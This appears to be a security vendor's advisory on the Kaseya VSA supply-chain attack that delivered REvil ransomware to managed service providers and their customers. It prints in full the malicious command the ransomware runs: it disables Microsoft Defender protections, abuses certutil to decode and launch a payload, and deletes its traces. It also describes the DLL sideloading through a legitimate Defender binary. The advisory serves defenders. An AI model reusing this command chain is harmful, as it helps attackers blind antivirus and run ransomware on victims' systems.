Ransomware attack ger stor paverkan pa foretag


Currently there is a widespread ongoing supply chain attack targeting MSPs by using Kaseya VSA to distribute a version of REvil ransomware on to customers environments. At this time there are multiple MSPs that have been hit as part of this. Kaseya VSA is both a cloud-based and on-premises MSP platform used for patch management and client monitoring.

Kaseya has issued a security advisory urging customers running the on-premises solution to shutdown their servers running VSA until further notice. It is critical that this is done as soon as possible since one of the first things the ransomware does is to disable administrative access to the VSA.

How it works

An automatic update was pushed to the product that included the REvil ransomware.

The ransomware will start of by running the following command:
“cmd.exe” /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

This will severly cripple Microsoft Defender and disable functionality that would otherwise most likely have prevented the ransomware.

After that it will decode c:\kworking\agent.crt and extract agent.exe which contains the files MsMpEng.exe and mpsvc.dll. The first file is a legitimate version of Microsoft Defender and the second one is the REvil encryptor payload that will make use of sideloading and inject itself into the legitimate Windows Defender exectuable and through that, encrypt the system.

Indicators of compromise

More IoCs


Orange Cyberdefense recommends immediately shutting down servers running Kaseya VSA and to follow further official updates from Kaseya.

REvil ransomware hits 200 companies in MSP supply-chain attack
REvil ransomware gang executes supply chain attack via malicious Kaseya update
Kaseya supply chain attack delivers mass ransomware event to US companies

Read More

Incident Response Hotline

Facing cyber incidents right now?

Contact our 24/7/365 world wide service incident response hotline.